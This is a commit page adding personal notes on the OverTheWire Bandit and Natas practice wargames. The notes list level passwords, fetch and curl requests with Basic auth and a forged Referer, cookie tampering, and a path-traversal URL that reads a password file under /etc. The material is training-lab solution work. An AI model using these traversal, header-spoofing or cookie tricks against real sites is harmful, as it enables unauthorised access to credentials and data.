Skip to content

Commit 03f64c2

Browse files
benhunterbenhunter
committed
Add overthewire bandit and natas
1 parent 89c6fde commit 03f64c2

File tree

2 files changed

+143
-0
lines changed

2 files changed

+143
-0
lines changed

overthewire/bandit/scratch.md

+59
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,59 @@
1+
https://overthewire.org/wargames/
2+
3+
# bandit0
4+
5+
NH2SXQwcBdpmTEzi3bvBHMM9H66vVXjL
6+
7+
# bandit1
8+
9+
bandit1@bandit:~$ cat ./-
10+
rRGizSaX8Mk1RTb1CNQoXTcYZWU6lgzi
11+
12+
# bandit2
13+
14+
aBZ0W5EmUfAf7kHTQeOwd8bauFJ2lAiG
15+
16+
# bandit3
17+
18+
2EW7BBsr6aMMoJ2HjW067dm8EgX26xNe
19+
20+
# bandit4
21+
22+
lrIWWI6bB37kxfiCQZqUdOIYfr6eEeqR
23+
24+
# bandit5
25+
26+
P4L4vucdmLnm8I7Vl7jG1ApGSfjYKqJU
27+
28+
# bandit6
29+
30+
z7WtoNQU2XfjmMtWA8u5rN4vzqu4v99S
31+
32+
# bandit7
33+
34+
TESKZC0XvTetK0S9xNwm25STk5iWrBvP
35+
36+
# bandit8
37+
38+
EN632PlfYiZbn3PhVK3XOGSlNInNE00t
39+
cat data.txt | sort | uniq -c | grep "1\ " | awk '{$1=$1};1' | cut -d ' ' -f 2
40+
41+
# bandit9
42+
43+
G7w8LIi6J3kTb8A7j9LgrywtEUlyyp6s
44+
45+
# bandit10
46+
47+
6zPeziLdR2RKNdNYFNb6nVCKzphlXHBM
48+
49+
# bandit11
50+
51+
JVNBBFSmZwKKOP0XbFXOoW8chDz5yVRv
52+
53+
# bandit12
54+
55+
wbWdlBxEir4CaE8LaPhauuOo6pwRmrDw
56+
57+
58+
59+
ssh -p 2220 [email protected]

overthewire/natas/notes.md

+84
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,84 @@
1+
natas1 is g9D9cREhslqBKtcA2uocGHPfMZVzeFK6
2+
natas2 is h4ubbcXrWqsTo7GGnnUMLppXbOogfBZ7
3+
<script>var wechallinfo = { "level": "natas2", "pass": "h4ubbcXrWqsTo7GGnnUMLppXbOogfBZ7" };</script></head>
4+
natas3:G6ctbMJ5Nb4cbFwhpMPSvxGHhQ7I6W8Q
5+
natas4:tKOcJIbzM4lTs8hbCmzn5Zr4434fGZQm
6+
7+
8+
const headers = new Headers();
9+
headers.append("Authorization", "Basic bmF0YXMzOkc2Y3RiTUo1TmI0Y2JGd2hwTVBTdnhHSGhRN0k2VzhR");
10+
const myInit = {
11+
method: "GET",
12+
headers: headers,
13+
// mode: "cors",
14+
// cache: "default",
15+
};
16+
const myRequest = new Request("http://natas4.natas.labs.overthewire.org/", myInit);
17+
const result = fetch(myRequest);
18+
19+
const myContentType = myRequest.headers.get("Content-Type"); // returns 'image/jpeg'
20+
21+
fetch("http://natas4.natas.labs.overthewire.org/", {
22+
"headers": {
23+
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
24+
"accept-language": "en-US,en;q=0.9",
25+
"authorization": "Basic bmF0YXMzOkc2Y3RiTUo1TmI0Y2JGd2hwTVBTdnhHSGhRN0k2VzhR",
26+
"cache-control": "no-cache",
27+
"pragma": "no-cache",
28+
"upgrade-insecure-requests": "1",
29+
""
30+
},
31+
"referrerPolicy": "strict-origin-when-cross-origin",
32+
"body": null,
33+
"method": "GET",
34+
"mode": "no-cors",
35+
"credentials": "include"
36+
}).then(result => console.log(result));
37+
38+
39+
40+
fetch("http://natas4.natas.labs.overthewire.org/", {
41+
"headers": {
42+
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
43+
"accept-language": "en-US,en;q=0.9",
44+
"authorization": "Basic bmF0YXM0OnRLT2NKSWJ6TTRsVHM4aGJDbXpuNVpyNDQzNGZHWlFt",
45+
"cache-control": "no-cache",
46+
"pragma": "no-cache",
47+
"upgrade-insecure-requests": "1",
48+
"referer": "http://natas5.natas.labs.overthewire.org/"
49+
},
50+
"referrerPolicy": "strict-origin-when-cross-origin",
51+
"body": null,
52+
"method": "GET",
53+
"mode": "cors",
54+
"credentials": "include"
55+
}).then(result => console.log(result.text()));
56+
57+
curl 'http://natas4.natas.labs.overthewire.org/' \
58+
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \
59+
-H 'Accept-Language: en-US,en;q=0.9' \
60+
-H 'Authorization: Basic bmF0YXM0OnRLT2NKSWJ6TTRsVHM4aGJDbXpuNVpyNDQzNGZHWlFt' \
61+
-H 'Cache-Control: no-cache' \
62+
-H 'Connection: keep-alive' \
63+
-H 'Pragma: no-cache' \
64+
-H 'Upgrade-Insecure-Requests: 1' \
65+
-H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36' \
66+
-H 'Referer: http://natas5.natas.labs.overthewire.org/'
67+
--compressed \
68+
--insecure
69+
70+
natas5 is Z0NsrtIkJoKALBCLi5eqFfcRN82Au2oD
71+
72+
change cookie for "is logged in"
73+
natas6 is fOIvE0MDtPTgRhqmmvvAOt2EfXR6uQgR
74+
75+
find secret in source code. Browse to linked file
76+
natas7 is jmxSiH3SP6Sonf8dv66ng8v1cIEdjXWr
77+
78+
local file inclusion
79+
http://natas7.natas.labs.overthewire.org/index.php?page=../../../../etc/natas_webpass/natas8
80+
a6bZCNYwdKqN5cGP11ZdtPg0iImQQhAB
81+
82+
http://natas8.natas.labs.overthewire.org/
83+
http://natas8.natas.labs.overthewire.org/index-source.html
84+
https://replit.com/@BenHunter2/GraveConsciousRule#main.php

0 commit comments

Comments
 (0)